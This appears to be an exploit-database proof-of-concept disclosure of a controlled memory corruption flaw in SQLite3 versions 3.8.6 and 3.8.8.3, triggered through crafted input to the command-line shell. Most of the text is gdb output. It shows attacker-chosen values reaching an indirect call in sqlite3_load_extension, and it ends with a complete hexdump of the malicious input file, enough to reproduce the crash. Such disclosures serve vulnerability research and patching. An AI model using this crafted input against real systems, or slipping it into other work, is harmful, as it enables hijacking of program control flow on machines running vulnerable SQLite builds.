# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)
Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.
The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.
====
andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax0x138 312
rbx0x41414141424242 18367622009733698
rcx0x7fffffffb590 140737488336272
rdx0x0 0
rsi0x555555779b43 93824994483011
rdi0x41414141424242 18367622009733698
rbp0x555555779b43 0x555555779b43
rsp0x7fffffffb4c0 0x7fffffffb4c0
r8 0x555555779b41 93824994483009
r9 0x6c 108
r100x0 0
r110x0 0
r120x555555779b48 93824994483016
r130x7fffffffb590 140737488336272
r140x555555779b40 93824994483008
r150x2 2
rip0x7ffff7ba06a0 0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48]
0x00007ffff7ba06a3 <sqlite3_load_extension+739>: movr15,rax
0x00007ffff7ba06a6 <sqlite3_load_extension+742>: learax,[rip+0x12bc1]# 0x7ffff7bb326e
End of assembler dump.
===
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off
Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169 }
(gdb) i r
rax0x138 312
rbx0x41414141424242 18367622009733698
rcx0x7fffffffb510 140737488336144
rdx0x0 0
rsi0x6261c3 6447555
rdi0x41414141424242 18367622009733698
rbp0x6261c3 0x6261c3
rsp0x7fffffffb440 0x7fffffffb440
r8 0x6261c1 6447553
r9 0x6c 108
r100x7fffffffb270 140737488335472
r110x7ffff7b5ae50 140737349267024
r120x6261c8 6447560
r130x7fffffffb510 140737488336144
r140x6261c0 6447552
r150x2 2
rip0x7ffff7b5b130 0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48]
0x00007ffff7b5b133 <sqlite3_load_extension+739>: movr15,rax
0x00007ffff7b5b136 <sqlite3_load_extension+742>: learax,[rip+0x587d8]# 0x7ffff7bb3915
End of assembler dump.
====
andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
000000003b 0a 2e 74 20 78 0a 2e74 0a 77 68 61 74 65 76|;..t x..t.whatev|
0000001065 72 00 0a 3b 0a 2e 740a 2e 6f 70 0a 2e 6c 20|er..;..t..op..l |
0000002043 43 43 43 42 42 42 4241 41 41 41 0a |CCCCBBBBAAAA.|
0000002d